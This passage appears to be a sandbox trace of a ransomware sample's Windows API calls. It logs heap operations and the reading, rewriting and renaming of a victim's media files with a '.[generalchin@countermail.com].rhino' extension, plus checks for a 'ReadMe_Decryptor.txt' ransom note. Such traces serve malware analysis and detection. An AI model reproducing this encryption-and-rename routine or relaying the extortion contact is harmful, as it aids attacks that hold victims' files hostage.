dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0082.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0082.398] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0082.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0082.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0082.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0082.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0082.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0082.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0082.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0082.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0082.399] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0082.399] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0082.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0082.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0082.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0082.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0082.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0082.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0082.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0082.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x74dfe0 [0082.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0082.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x750f78 [0082.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74dfe0 | out: hHeap=0x6d0000) returned 1 [0082.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2230048 [0082.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x750f78 | out: hHeap=0x6d0000) returned 1 [0082.748] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x74dfe0 [0082.750] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0082.751] WriteFile (in: hFile=0x124, lpBuffer=0x74e000*, nNumberOfBytesToWrite=0x93f7, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x74e000*, lpNumberOfBytesWritten=0x4af2ac*=0x93f7, lpOverlapped=0x0) returned 1 [0082.751] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74dfe0 | out: hHeap=0x6d0000) returned 1 [0082.753] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x93f7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0082.753] CloseHandle (hObject=0x124) returned 1 [0082.754] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6f36d0 [0082.754] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x703e78 [0082.754] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.754] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\ev v7qxZKth.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\ev v7qxzkth.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\ev v7qxZKth.mp3.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\ev v7qxzkth.mp3.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0082.755] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.755] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0082.755] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0082.755] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fac68 [0082.756] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0082.756] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0082.756] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x6f36d0 [0082.756] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0082.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.756] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\lw5stwB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\lw5stwb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.756] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0xc575 [0082.756] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xc695, nNumberOfBytesToLockHigh=0x0) returned 1 [0082.756] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.756] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0082.758] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.758] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0xc575, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0xc575, lpOverlapped=0x0) returned 1 [0082.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0082.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0082.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0082.759] GetLastError () returned 0x0 [0082.759] SetLastError (dwErrCode=0x0) [0082.759] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.759] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc598) returned 0x744cd8 [0082.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0082.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0082.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.760] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0082.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0082.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0082.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0082.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.760] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0082.760] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0082.761] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0082.761] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0082.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0082.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0082.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0082.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0082.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0082.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0082.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0082.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0082.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0082.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0082.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0082.762] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0082.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0082.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0082.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0082.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x751278 [0082.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0082.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x754210 [0082.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x751278 | out: hHeap=0x6d0000) returned 1 [0082.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2230048 [0082.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x754210 | out: hHeap=0x6d0000) returned 1 [0082.765] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2236b28 [0082.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0082.766] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x2240b58 [0082.767] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2236b28 | out: hHeap=0x6d0000) returned 1 [0082.767] WriteFile (in: hFile=0x124, lpBuffer=0x2240b60*, nNumberOfBytesToWrite=0xc695, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x2240b60*, lpNumberOfBytesWritten=0x4af2ac*=0xc695, lpOverlapped=0x0) returned 1 [0082.768] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2240b58 | out: hHeap=0x6d0000) returned 1 [0082.768] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xc695, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0082.768] CloseHandle (hObject=0x124) returned 1 [0082.770] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0082.770] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x6f9208 [0082.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0082.771] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\lw5stwB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\lw5stwb.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\lw5stwB.swf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\lw5stwb.swf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0082.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f9208 | out: hHeap=0x6d0000) returned 1 [0082.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0082.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0082.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0082.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fac68 | out: hHeap=0x6d0000) returned 1 [0082.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fac68 [0082.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x6f36d0 [0082.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fac68 | out: hHeap=0x6d0000) returned 1 [0082.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\rGrQROZjIWQS_w.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\rgrqrozjiwqs_w.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.772] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0xd7a5 [0082.772] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd8c5, nNumberOfBytesToLockHigh=0x0) returned 1 [0082.772] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.772] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0082.774] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.774] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0xd7a5, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0xd7a5, lpOverlapped=0x0) returned 1 [0082.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0082.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0082.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0082.775] GetLastError () returned 0x0 [0082.775] SetLastError (dwErrCode=0x0) [0082.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd7c8) returned 0x744cd8 [0082.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0082.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0082.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.776] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0082.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0082.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0082.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0082.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0082.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0082.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0082.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0082.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0082.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0082.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: 